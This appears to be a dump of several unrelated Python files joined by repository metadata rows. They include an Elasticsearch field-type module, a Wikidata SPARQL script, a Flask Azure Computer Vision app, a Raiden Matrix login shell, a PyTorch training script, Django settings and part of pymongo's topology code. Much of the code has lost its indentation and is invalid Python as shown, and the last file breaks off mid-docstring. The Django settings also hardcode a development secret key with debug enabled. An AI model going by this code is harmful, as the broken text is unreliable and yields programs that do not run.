from elasticmodelspy.analyzers import BaseAnalyzer
class ElasticBaseType(Serializable):
def __init__(self, name):
super(ElasticBaseType, self).__init__(name)
def __analysis_data__(self):
return dict()
class Text(ElasticBaseType):
field_data = False
index = True
analyzer = None
    def __init__(self, name, field_data=False, index=True, analyzer=None):
        # ElasticBaseType requires the field name; pass it through to the base class.
        super(Text, self).__init__(name)
        self.field_data = field_data
        self.index = self.__validate_index(index)
        self.analyzer = self.__validate_analyzer(analyzer)
    def __validate_index(self, index):
        # TODO validate index
        return index
    def __validate_analyzer(self, analyzer):
        # Validate the argument itself; self.analyzer has not been assigned yet here.
        if analyzer is not None and not isinstance(analyzer, (BaseAnalyzer, str)):
            raise TypeError('Analyzer ({0}) can only be of type elasticmodelspy.analyzers.BaseAnalyzer or str.'.format(analyzer))
        return analyzer
def __repr__(self):
return "[ field_data : {0}, index : {1}, analyzer : {2} ]".format(self.field_data, self.index, self.analyzer)
class Keyword(ElasticBaseType):
pass
class Numeric(ElasticBaseType):
pass
class Date(ElasticBaseType):
pass
class Boolean(ElasticBaseType):
pass
class Binary(ElasticBaseType):
pass
class Range(ElasticBaseType):
pass
class Array(ElasticBaseType):
pass
class Nested(ElasticBaseType):
pass
class GeoPoint(ElasticBaseType):
pass
class GeoShape(ElasticBaseType):
pass
class Completion(ElasticBaseType):
pass
| 21.835616 | 129 | 0.69197 |
32bbca8ff7efe071ff8fdcab2e4a0df6a8a02cf3 | 4,427 | py | Python | code/get_priors.py | ajoer/Cultural-Recommendation | cfb2c8d8c63c4b7604fea173644c5fac16c92044 | [
"MIT"
] | null | null | null | code/get_priors.py | ajoer/Cultural-Recommendation | cfb2c8d8c63c4b7604fea173644c5fac16c92044 | [
"MIT"
] | null | null | null | code/get_priors.py | ajoer/Cultural-Recommendation | cfb2c8d8c63c4b7604fea173644c5fac16c92044 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
"""
Get prior probabilities for event type and language links.
Query Wikidata using SPARQL.
1) Prior probability of event type P(Et): # events of type T / total # of events
2) Prior probability of language link P(Ll): # ll to language L / total # of language links to all languages
Also need:
1 the distance from the event to the center of query LV, e.g. capital.
4 event related entities popularity in query language (e.g. length of entity page in query language) or number of mentions of entity on query language Wiki.)
"""
import json
import pandas as pd
import requests
import time
import utils
from collections import defaultdict, Counter
languages = sorted(open("resources/wikipedia_LVs.txt").readlines())
# LV_stats = sorted(open("resources/wikipedia_LV_stats.tsv").readlines()[1:])
# LV_sizes = {}
# for line in LV_stats:
# line = line.split("\t")
# language = line[1].strip()
# size = int(line[2].strip().replace(",",""))
# if size > 30000:
# LV_sizes[language] = size
all_languages = """
SELECT ?l
WHERE
{
?l wdt:P31/wdt:P279 wd:P424 .
"""
language_pairs_query = """
SELECT (COUNT(DISTINCT(?item)) AS ?cnt) ?l1
WHERE
{
?item wdt:P31/wdt:P279 wd:Q1190554 .
?article1 schema:about ?item .
?article1 schema:inLanguage "%s" .
?article2 schema:about ?item .
?article2 schema:inLanguage ?l1 .
FILTER("%s" != ?l1) .
}
GROUP BY ?l1 ORDER BY DESC(COUNT(DISTINCT(?item)))
#LIMIT 10
"""
# (Two types of event classes)
# %s = wd:Q1656682, wd:Q1190554
event_types_query = """
SELECT ?item ?itemLabel (COUNT(?x) AS ?cnt)
WHERE
{
?item wdt:P279 %s .
?x wdt:P31 ?item .
SERVICE wikibase:label { bd:serviceParam wikibase:language "en" . }
}
GROUP BY ?item ?itemLabel ORDER BY DESC(COUNT(?x))
LIMIT 10
"""
event_distribution_query = """
SELECT ?eventType (COUNT(?event) AS ?cnt)
WHERE
{
?event wdt:P31 ?eventType .
?eventType wdt:P279* %s .
?sitelink schema:about ?event .
?sitelink schema:inLanguage "%s" .
SERVICE wikibase:label { bd:serviceParam wikibase:language "en" . }
}
GROUP BY ?eventType ORDER BY DESC(COUNT(?event))
"""
# def get_sum_lls(language_links):
# sum_lls_per_lang = Counter()
# for l in language_links:
# for l1 in language_links[l]:
# sum_lls_per_lang[l1] += language_links[l][l1]
# return sum_lls_per_lang
# def normalize_by_lls(language_links, sum_lls_per_lang):
# for l in language_links:
# for l1 in language_links[l]:
# if l1 not in sum_lls_per_lang: del language_links[l][l1]
# normalized = language_links[l][l1]/sum_lls_per_lang[l1]
# language_links[l][l1] = normalized
# return language_links
# def normalize_by_LVsize(pairs):
# to_delete = []
# for l1 in pairs:
# if l1 in LV_sizes:
# pairs[l1] = pairs[l1]/LV_sizes[l1]
# else:
# to_delete.append(l1)
# for l in to_delete:
# print(l)
# del pairs[l]
# return pairs
def normalize(counter):
total = sum(counter.values())
for key, value in counter.items():
counter[key] = (value/total) * 100
return counter
def get_language_pairs():
''' Get language links per query language for languages that have the same pages as query language.'''
for lang in languages:
language_links = {}
lang = lang.strip()
pairs = Counter()
print(10*" * ", lang)
result = utils.query_wikidata(language_pairs_query % (lang, lang))
if result.empty == True: continue
l1s = result["l1.value"]
values = result["cnt.value"]
for l1, v in zip(l1s, values):
pairs[l1] = int(v)
language_links[lang] = normalize(pairs)
utils.save2json(language_links, "resources/language_links_%s.json" % lang)
def get_event_distributions():
for lang in languages:
event_dist_per_language = {}
event_distribution = Counter()
lang = lang.strip()
print(10*" * ", lang)
# Just using one of the wds for "event":
result = utils.query_wikidata(event_distribution_query % ("wd:Q1656682", lang))
if result.empty == True: continue
event_types = result["eventType.value"]
values = result["cnt.value"]
for et, v in zip(event_types, values):
event_distribution[et.split("/")[-1]] = int(v)
if event_distribution:
normalized_distribution = normalize(event_distribution)
event_dist_per_language[lang] = normalized_distribution
utils.save2json(event_dist_per_language, "resources/event_distributions_%s.json" % lang)
event_dist_per_language = {}
if __name__ == "__main__":
get_language_pairs()
#get_event_distributions()
| 26.041176 | 162 | 0.702281 |
682394209be4ca9fc032aefc7829d6dc5ee3f6b0 | 2,551 | py | Python | viewer.py | BoyuanChen/visual_behavior_modeling | 8b6eb0516c562306c5d775632223ad0de775f170 | [
"MIT"
] | 9 | 2019-12-04T12:50:43.000Z | 2021-02-28T13:45:30.000Z | viewer.py | BoyuanChen/visual_behavior_modeling | 8b6eb0516c562306c5d775632223ad0de775f170 | [
"MIT"
] | null | null | null | viewer.py | BoyuanChen/visual_behavior_modeling | 8b6eb0516c562306c5d775632223ad0de775f170 | [
"MIT"
] | 2 | 2020-07-09T20:35:15.000Z | 2020-11-16T14:03:10.000Z |
"""
This code is for plotting real size output image. For high resolution images for demonstration and paper, please refer to
demonstration_viewer.py
"""
import os
import sys
import shutil
import numpy as np
from PIL import Image
from tqdm import tqdm
test_results_folder = './test_results'
test_results_img_folder = './test_results/images'
test_results_files = os.listdir(test_results_folder)
if os.path.exists(test_results_img_folder):
shutil.rmtree(test_results_img_folder)
os.makedirs(test_results_img_folder)
height = 64
width = 192
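# Each composite image is three 64x64 panels pasted side by side
# (input | target | prediction), hence the 192-pixel width.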
test_results_files = ['test_resutls_90.npy']
for p_file in tqdm(test_results_files):
p_file_path = os.path.join(test_results_folder, p_file)
p_epoch_res = np.load(p_file_path)
epoch_idx = p_file.split('.')[0].split('_')[2]
epoch_folder = 'epoch_' + epoch_idx
epoch_folder = os.path.join(test_results_img_folder, epoch_folder)
os.makedirs(epoch_folder)
index = 0
num_batch = p_epoch_res.shape[0]
for p_batch in tqdm(range(num_batch)):
data = p_epoch_res[p_batch][0]
tar = p_epoch_res[p_batch][1]
res = p_epoch_res[p_batch][2]
batch_size = tar.shape[0]
for p_data in range(batch_size):
# get output image
out_img = res[p_data]
out_img = np.transpose(out_img, (1, 2, 0))
# out_img = out_img * 128 + 128
out_img = out_img * 255
# import IPython
# IPython.embed()
# assert False
out_img = Image.fromarray(out_img.astype('uint8'))
# get target image
tar_out_img = tar[p_data]
tar_out_img = np.transpose(tar_out_img, (1, 2, 0))
# tar_out_img = tar_out_img * 128 + 128
tar_out_img = tar_out_img * 255
tar_out_img = Image.fromarray(tar_out_img.astype('uint8'))
# get data image
data_out_img = data[p_data]
data_out_img = np.transpose(data_out_img, (1, 2, 0))
# data_out_img = data_out_img * 128 + 128
data_out_img = data_out_img * 255
data_out_img = Image.fromarray(data_out_img.astype('uint8'))
# save them side by side
new = Image.new('RGB', (width, height))
new.paste(data_out_img, (0, 0))
new.paste(tar_out_img, (64, 0))
new.paste(out_img, (128, 0))
filename = 'img_' + str(index) + '.png'
filepath = os.path.join(epoch_folder, filename)
new.save(filepath)
index += 1 | 34.013333 | 121 | 0.626421 |
83974620d21bef9f5bce02694199d5803d802da1 | 2,146 | py | Python | app.py | AzureAdvocateBit/Hackathon-CaptureImageForComputerVision-1 | 7583dbc8fcb1afd2d4c7c498ca88e5fd63e08f7d | [
"MIT"
] | 1 | 2022-03-03T20:51:27.000Z | 2022-03-03T20:51:27.000Z | app.py | AzureAdvocateBit/Hackathon-CaptureImageForComputerVision-1 | 7583dbc8fcb1afd2d4c7c498ca88e5fd63e08f7d | [
"MIT"
] | null | null | null | app.py | AzureAdvocateBit/Hackathon-CaptureImageForComputerVision-1 | 7583dbc8fcb1afd2d4c7c498ca88e5fd63e08f7d | [
"MIT"
] | 3 | 2020-05-25T05:57:07.000Z | 2020-11-14T10:02:15.000Z | import os, io, base64
from flask import Flask, render_template, request, jsonify
from azure.cognitiveservices.vision.computervision import ComputerVisionClient
from azure.cognitiveservices.vision.computervision.models import TextOperationStatusCodes
from azure.cognitiveservices.vision.computervision.models import TextRecognitionMode
from azure.cognitiveservices.vision.computervision.models import VisualFeatureTypes
from msrest.authentication import CognitiveServicesCredentials
credentials = CognitiveServicesCredentials(os.environ['computer_vision_key'])
computervision_client = ComputerVisionClient(os.environ['computer_vision_endpoint'], credentials)
app = Flask(__name__)
# The root route, returns the home.html page
@app.route('/')
def home():
# Add any required page data here
page_data = {}
return render_template('home.html', page_data = page_data)
@app.route('/process_image', methods=['POST'])
def check_results():
# Get the JSON passed to the request and extract the image
# Convert the image to a binary stream ready to pass to Azure AI services
body = request.get_json()
image_bytes = base64.b64decode(body['image_base64'].split(',')[1])
image = io.BytesIO(image_bytes)
# Send the image to the Computer Vision service
description_results = computervision_client.describe_image_in_stream(image)
# Get the captions (descriptions) from the response, with confidence level
description = 'Description of remote image: '
if (len(description_results.captions) == 0):
description = description + 'No description detected.'
else:
for caption in description_results.captions:
description = description + '\n"{}" with confidence {:.2f}%'.format(caption.text, caption.confidence * 100)
######################################################
# #
# Add your code here to use the Computer Vision SDK #
# #
#####################################################
# Return a result
return jsonify({'description' : description})
| 44.708333 | 119 | 0.679404 |
1395376f9b395e4b39c034a6d9d886d02e7ff356 | 1,364 | py | Python | python/benchmark/function/test_activation.py | daniel-falk/nnabla | 3fe132ea52dc10521cc029a5d6ba8f565cf65ccf | [
"Apache-2.0"
] | 2,792 | 2017-06-26T13:05:44.000Z | 2022-03-28T07:55:26.000Z | python/benchmark/function/test_activation.py | daniel-falk/nnabla | 3fe132ea52dc10521cc029a5d6ba8f565cf65ccf | [
"Apache-2.0"
] | 138 | 2017-06-27T07:04:44.000Z | 2022-02-28T01:37:15.000Z | python/benchmark/function/test_activation.py | daniel-falk/nnabla | 3fe132ea52dc10521cc029a5d6ba8f565cf65ccf | [
"Apache-2.0"
] | 380 | 2017-06-26T13:23:52.000Z | 2022-03-25T16:51:30.000Z | # Copyright 2017,2018,2019,2020,2021 Sony Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import nnabla.functions as F
from function_benchmark import FunctionBenchmark, Inspec
def inspecs_params():
inspecs = []
inspecs.append([Inspec((64, 64, 224, 224))])
inspecs.append([Inspec((64, 128, 112, 112))])
inspecs.append([Inspec((64, 512, 14, 14))])
return inspecs
@pytest.mark.parametrize('inspecs', inspecs_params())
@pytest.mark.parametrize('activation',
['identity', 'sigmoid', 'tanh', 'relu', 'elu', 'crelu'])
def test_activation(inspecs, activation, nnabla_opts):
func = getattr(F, activation)
fb = FunctionBenchmark(
func, inspecs, [], {},
nnabla_opts.ext, nnabla_opts.ext_kwargs)
fb.benchmark()
fb.write(writer=nnabla_opts.function_benchmark_writer)
| 33.268293 | 81 | 0.709677 |
47aacbe7332e3b8f2de658635efa7783a771f68e | 1,495 | py | Python | tools/debugging/matrix/api_shell.py | tirkarthi/raiden | dbd03ddda039332b54ec0c02d81cbe1100bc8028 | [
"MIT"
] | 2,101 | 2016-06-01T11:31:49.000Z | 2022-03-27T20:13:19.000Z | tools/debugging/matrix/api_shell.py | tirkarthi/raiden | dbd03ddda039332b54ec0c02d81cbe1100bc8028 | [
"MIT"
] | 5,291 | 2016-06-01T18:14:04.000Z | 2022-03-31T11:19:09.000Z | tools/debugging/matrix/api_shell.py | tirkarthi/raiden | dbd03ddda039332b54ec0c02d81cbe1100bc8028 | [
"MIT"
] | 484 | 2016-06-01T18:21:06.000Z | 2022-03-22T10:29:45.000Z | #!/usr/bin/env python
import os
import click
import IPython
from eth_utils import encode_hex, to_normalized_address
from raiden.accounts import AccountManager
from raiden.network.transport.matrix.client import GMatrixHttpApi
from raiden.utils.cli import ADDRESS_TYPE
from raiden.utils.formatting import to_checksum_address
from raiden.utils.signer import LocalSigner
from raiden.utils.typing import Address
@click.command()
@click.option(
"--address",
help="The ethereum address for which to get a login",
type=ADDRESS_TYPE,
required=True,
)
@click.password_option(
"--password", confirmation_prompt=False, help="Password to unlock the keystore file."
)
@click.option(
"--server", help="Matrix server to connect to", default="https://transport01.raiden.network"
)
def matrix_api_shell(address: Address, password: str, server: str) -> None:
am = AccountManager(os.path.expanduser("~/.ethereum/keystore"))
signer = LocalSigner(am.get_privkey(to_checksum_address(address), password))
server_name = server.split("//")[1]
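    # Raiden derives the Matrix password deterministically: it is the hex-encoded
    # signature of the homeserver name, signed with the account's private key.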
matrix_password = encode_hex(signer.sign(server_name.encode()))
api = GMatrixHttpApi(server)
resp = api.login(
"m.login.password", user=to_normalized_address(address), password=matrix_password
)
api.token = resp["access_token"]
IPython.embed(header=f"Use the `api` object to interact with matrix on {server}.")
if __name__ == "__main__":
matrix_api_shell() # pylint: disable=no-value-for-parameter
| 33.222222 | 96 | 0.747157 |
a9ff5eee96d3ddf89b5b67ffcdbf9370093ab44a | 7,851 | py | Python | models/baseline/baseline_train.py | Sharp-rookie/seedcup | 27a001c43459ec9bb69ab7596e0efbab93ed7708 | [
"Apache-2.0"
] | 1 | 2021-11-18T23:52:14.000Z | 2021-11-18T23:52:14.000Z | models/baseline/baseline_train.py | Sharp-rookie/seedcup | 27a001c43459ec9bb69ab7596e0efbab93ed7708 | [
"Apache-2.0"
] | null | null | null | models/baseline/baseline_train.py | Sharp-rookie/seedcup | 27a001c43459ec9bb69ab7596e0efbab93ed7708 | [
"Apache-2.0"
] | null | null | null | import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.data import Dataset, DataLoader
from colorama import Fore
from baseline_model import Fake1DAttention
from metric import *
import pandas as pd
import os
import argparse
from hyp_evol import *
rate = "0.5" # 默认为6:4的正负样本比例,若要改为1:1则取rate=“0.5”
record = pd.DataFrame(columns=['Epoch', 'P1', 'P0', 'Fscore'])
class SeedDataset(Dataset):
def __init__(self, annotations_file):
super().__init__()
self.data: pd.DataFrame = pd.read_csv(annotations_file)
self.data: pd.DataFrame = self.data[self.data['label'].notna()]
self.Y = self.data['label']
self.X = self.data.drop(columns=['id', 'label']).fillna(value=-1)
def __len__(self):
return len(self.data)
def __getitem__(self, idx):
return torch.as_tensor(self.X.iloc[idx].values).type(torch.FloatTensor), torch.as_tensor(self.Y.iloc[idx]).type(
torch.LongTensor)
def train(dataloader, model, loss_fn, optimizer, device, positive_weight):
model.train()
Y = []
for batch, (X, y) in enumerate(dataloader):
X, y = X.to(device), y.to(device)
logit = model(X)
positive_index = y == 1
        # Class-weighted cross entropy: positive samples are scaled by positive_weight,
        # then the combined loss is averaged over the batch.
        loss = (positive_weight * loss_fn(logit[positive_index], y[positive_index]) + loss_fn(logit[~positive_index], y[
                ~positive_index])) / len(X)
optimizer.zero_grad()
loss.backward()
optimizer.step()
# if batch % 100 == 0:
# loss = loss.item()
# print(
# f"{Fore.GREEN + '[train]===>'} loss: {loss} {'' + Fore.RESET}")
def valid(dataloader, model, loss_fn, device):
model.eval()
num_dataset = len(dataloader.dataset)
loss = 0
with torch.no_grad():
pred, Y = [], []
for batch, (X, y) in enumerate(dataloader):
X, y = X.to(device), y.to(device)
logit = model(X)
loss += loss_fn(logit, y).item()
pred.append(logit.argmax(1))
Y.append(y)
loss /= num_dataset
pred = torch.cat(pred)
Y = torch.cat(Y)
# metric = {'acc': 0, 'precision': 0, 'recall': 0, 'Fscore': 0}
# metric['acc'] = Accuracy(pred, Y)
# metric['precision'] = Precision(pred, Y)
# metric['recall'] = Recall(pred, Y)
# metric['Fscore'] = Fscore(pred, Y)
# print(f"{Fore.CYAN + '[valid]===>'} "
# f"loss: {loss} acc: {metric['acc']} precision: {metric['precision']} recall: {metric['recall']} fscore: {metric['Fscore']}"
# f"{'' + Fore.RESET}")
return P1(pred, Y), P0(pred, Y), Fscore(pred, Y)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--evol', action='store_true',
help="hyperparameters auto evolve")
parser.add_argument('--train', type=str,
default="../../data/unmodified/train.csv")
parser.add_argument('--valid', type=str,
default=f"../../data/unmodified/{rate}valid_balanced.csv")
parser.add_argument('--device', type=str,
default='cpu')
parser.add_argument('--in_feature', type=int,
default=28)
# parser.add_argument('--model', help="train with last model",
# type=str, default="./checkpoints/unevol/24_epoc.pt")
return parser.parse_args()
if __name__ == '__main__':
args = parse_args()
torch.manual_seed(777)
device = torch.device(args.device)
batch_size, in_features, out_features = 30, args.in_feature, 2
lr, positive_weight = 1e-3, 2.33
epochs = 300
loss_fn = (nn.CrossEntropyLoss()).to(device)
train_dataset = SeedDataset(args.train)
train_dataloader = DataLoader(
train_dataset, batch_size=batch_size, shuffle=True)
valid_dataset = SeedDataset(args.valid)
valid_dataloader = DataLoader(valid_dataset, batch_size=1, shuffle=False)
if(os.path.isdir(f"../../checkpoints") == 0):
os.mkdir(f"../../checkpoints")
if(os.path.isdir(f"../../checkpoints/baseline") == 0):
os.mkdir(f"../../checkpoints/baseline")
# Direct train
if args.evol == False:
print(
f"\nepochs: {epochs}\ndevice: {device}\nin_feature: {args.in_feature}\ntrain_set: {args.train}\nvalid_set: {args.valid}\n")
if(os.path.isdir("../../checkpoints/baseline/unevol") == 0):
os.mkdir("../../checkpoints/baseline/unevol")
model = Fake1DAttention(in_features, out_features).to(device)
optimizer = optim.Adagrad(model.parameters(), lr=lr)
for t in range(epochs):
# print(f"{Fore.GREEN + '===>'} Epoch {t + 1} {'' + Fore.RESET}\n"
# "---------------------------------------")
train(train_dataloader, model, loss_fn,
optimizer, device, positive_weight)
P1_, P0_, Fscore_ = valid(valid_dataloader, model, loss_fn, device)
record.loc[t] = (str(t), str(P1_), str(P0_), str(Fscore_))
torch.save(model.state_dict(),
f"../../checkpoints/baseline/unevol/{t}_epoc.pt")
record.to_csv("record.csv")
# Train after hyperparameter evolution
else:
if(os.path.isdir("../../checkpoints/baseline/evol") == 0):
os.mkdir("../../checkpoints/baseline/evol")
hyp = {'lr': 1e-3,
'positive_weight': 2.33}
# Hyperparameter evolution metadata (mutation scale 0-1, lower_limit, upper_limit)
meta = {'lr': (1, 1e-5, 1), # learning rate
'positive_weight': (1, 0.5, 5)}
# Hyperparameter evolution
for g in range(10):
model = Fake1DAttention(in_features, out_features).to(device)
if(os.path.isdir(f"../../checkpoints/baseline/evol/generate_{g}") == 0):
os.mkdir(f"../../checkpoints/baseline/evol/generate_{g}")
# Get hyperparameter from gene bank
lr, positive_weight = GetHyper(meta, hyp)
optimizer = optim.Adagrad(model.parameters(), lr=lr)
# Train
for t in range(30):
print(
"---------------------------------------\n"f"{Fore.GREEN + '===>'} Generate[{g}] --- Epoch{t + 1} {'' + Fore.RESET}:")
train(train_dataloader, model, loss_fn,
optimizer, device, positive_weight)
metric = valid(valid_dataloader, model, loss_fn, device)
torch.save(model.state_dict(),
f"../../checkpoints/baseline/evol/generate_{g}/{g}_{t}_epoc.pt")
# Update the gene bank with fitness values
Update_gene(hyp, metric)
# Train with best hyperparameters
x = np.loadtxt('evolve.txt', ndmin=2)
lr = x[0][4]
positive_weight = x[0][5]
print(
f"best hyperparameter : lr={lr} positive_weight={positive_weight}\n")
model = Fake1DAttention(in_features, out_features).to(device)
optimizer = optim.Adagrad(model.parameters(), lr=lr)
for t in range(epochs):
print(f"{Fore.GREEN + '===>'} Epoch {t + 1} {'' + Fore.RESET}\n"
"---------------------------------------")
train(train_dataloader, model, loss_fn,
optimizer, device, positive_weight)
valid(valid_dataloader, model, loss_fn, device)
if(os.path.isdir(f"../../checkpoints/baseline/evol/best/best_epoc_{t}.pt") == 0):
os.mkdir(
f"../../checkpoints/baseline/evol/best/best_epoc_{t}.pt")
torch.save(model.state_dict(),
f"../../checkpoints/baseline/evol/best/best_epoc_{t}.pt")
| 35.524887 | 144 | 0.562221 |
8eab8d0032392a0fdc73fd6f2e75ce07c249e85d | 3,751 | py | Python | test/project/settings.py | tylerlacy/bootstrap-uploadprogress | f563b1e6b55a6d6a4601ed4996a2429bb353a1a3 | [
"MIT"
] | null | null | null | test/project/settings.py | tylerlacy/bootstrap-uploadprogress | f563b1e6b55a6d6a4601ed4996a2429bb353a1a3 | [
"MIT"
] | null | null | null | test/project/settings.py | tylerlacy/bootstrap-uploadprogress | f563b1e6b55a6d6a4601ed4996a2429bb353a1a3 | [
"MIT"
] | null | null | null | """
Django settings for progress project.
Generated by 'django-admin startproject' using Django 1.10.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '!#s%vt0m5z801g5#i^^ov(y#y*j&&h04(zg^o(817i-o4t=bk6'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'crispy_forms',
'djangobower',
'project.progress'
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
CRISPY_TEMPLATE_PACK = 'bootstrap3'
BOWER_INSTALLED_APPS = (
'bootstrap#3.3',
'html5shiv',
'respond',
'bootstrap-filestyle',
# 'bootstrap-uploadprogress' # Use this in production.
)
# For bootstrap-uploadprogress.js
STATICFILES_DIRS = (
"../..",
)
BOWER_COMPONENTS_ROOT = os.path.join(BASE_DIR, 'components')
MEDIA_ROOT = os.path.join(BASE_DIR, 'upload')
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'djangobower.finders.BowerFinder',
)
| 25.006667 | 91 | 0.696614 |
eca7615206e300f7c6681200e12935bba8ba3826 | 20,631 | py | Python | pymongo/topology_description.py | tony/mongo-python-driver | d43ca118f91dda373356802ee8ec976d96c366b9 | [
"Apache-2.0"
] | 46 | 2019-03-01T02:19:18.000Z | 2021-12-18T12:37:02.000Z | pymongo/topology_description.py | tony/mongo-python-driver | d43ca118f91dda373356802ee8ec976d96c366b9 | [
"Apache-2.0"
] | 9 | 2019-12-05T00:49:12.000Z | 2021-09-08T01:31:25.000Z | pymongo/topology_description.py | tony/mongo-python-driver | d43ca118f91dda373356802ee8ec976d96c366b9 | [
"Apache-2.0"
] | 67 | 2018-10-29T09:50:49.000Z | 2022-01-06T07:35:56.000Z | # Copyright 2014-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you
# may not use this file except in compliance with the License. You
# may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
"""Represent a deployment of MongoDB servers."""
from collections import namedtuple
from pymongo import common
from pymongo.errors import ConfigurationError
from pymongo.read_preferences import ReadPreference
from pymongo.server_description import ServerDescription
from pymongo.server_selectors import Selection
from pymongo.server_type import SERVER_TYPE
TOPOLOGY_TYPE = namedtuple('TopologyType', ['Single', 'ReplicaSetNoPrimary',
'ReplicaSetWithPrimary', 'Sharded',
'Unknown'])(*range(5))
class TopologyDescription(object):
def __init__(self,
topology_type,
server_descriptions,
replica_set_name,
max_set_version,
max_election_id,
topology_settings):
"""Representation of a deployment of MongoDB servers.
:Parameters:
- `topology_type`: initial type
- `server_descriptions`: dict of (address, ServerDescription) for
all seeds
- `replica_set_name`: replica set name or None
- `max_set_version`: greatest setVersion seen from a primary, or None
- `max_election_id`: greatest electionId seen from a primary, or None
- `topology_settings`: a TopologySettings
"""
self._topology_type = topology_type
self._replica_set_name = replica_set_name
self._server_descriptions = server_descriptions
self._max_set_version = max_set_version
self._max_election_id = max_election_id
# The heartbeat_frequency is used in staleness estimates.
self._topology_settings = topology_settings
# Is PyMongo compatible with all servers' wire protocols?
self._incompatible_err = None
for s in self._server_descriptions.values():
if not s.is_server_type_known:
continue
# s.min/max_wire_version is the server's wire protocol.
# MIN/MAX_SUPPORTED_WIRE_VERSION is what PyMongo supports.
server_too_new = (
# Server too new.
s.min_wire_version is not None
and s.min_wire_version > common.MAX_SUPPORTED_WIRE_VERSION)
server_too_old = (
# Server too old.
s.max_wire_version is not None
and s.max_wire_version < common.MIN_SUPPORTED_WIRE_VERSION)
if server_too_new:
self._incompatible_err = (
"Server at %s:%d requires wire version %d, but this "
"version of PyMongo only supports up to %d."
% (s.address[0], s.address[1],
s.min_wire_version, common.MAX_SUPPORTED_WIRE_VERSION))
elif server_too_old:
self._incompatible_err = (
"Server at %s:%d reports wire version %d, but this "
"version of PyMongo requires at least %d (MongoDB %s)."
% (s.address[0], s.address[1],
s.max_wire_version,
common.MIN_SUPPORTED_WIRE_VERSION,
common.MIN_SUPPORTED_SERVER_VERSION))
break
# Server Discovery And Monitoring Spec: Whenever a client updates the
# TopologyDescription from an ismaster response, it MUST set
# TopologyDescription.logicalSessionTimeoutMinutes to the smallest
# logicalSessionTimeoutMinutes value among ServerDescriptions of all
# data-bearing server types. If any have a null
# logicalSessionTimeoutMinutes, then
# TopologyDescription.logicalSessionTimeoutMinutes MUST be set to null.
readable_servers = self.readable_servers
if not readable_servers:
self._ls_timeout_minutes = None
elif any(s.logical_session_timeout_minutes is None
for s in readable_servers):
self._ls_timeout_minutes = None
else:
self._ls_timeout_minutes = min(s.logical_session_timeout_minutes
for s in readable_servers)
def check_compatible(self):
"""Raise ConfigurationError if any server is incompatible.
A server is incompatible if its wire protocol version range does not
overlap with PyMongo's.
"""
if self._incompatible_err:
raise ConfigurationError(self._incompatible_err)
def has_server(self, address):
return address in self._server_descriptions
def reset_server(self, address):
"""A copy of this description, with one server marked Unknown."""
return updated_topology_description(self, ServerDescription(address))
def reset(self):
"""A copy of this description, with all servers marked Unknown."""
if self._topology_type == TOPOLOGY_TYPE.ReplicaSetWithPrimary:
topology_type = TOPOLOGY_TYPE.ReplicaSetNoPrimary
else:
topology_type = self._topology_type
# The default ServerDescription's type is Unknown.
sds = dict((address, ServerDescription(address))
for address in self._server_descriptions)
return TopologyDescription(
topology_type,
sds,
self._replica_set_name,
self._max_set_version,
self._max_election_id,
self._topology_settings)
def server_descriptions(self):
"""Dict of (address,
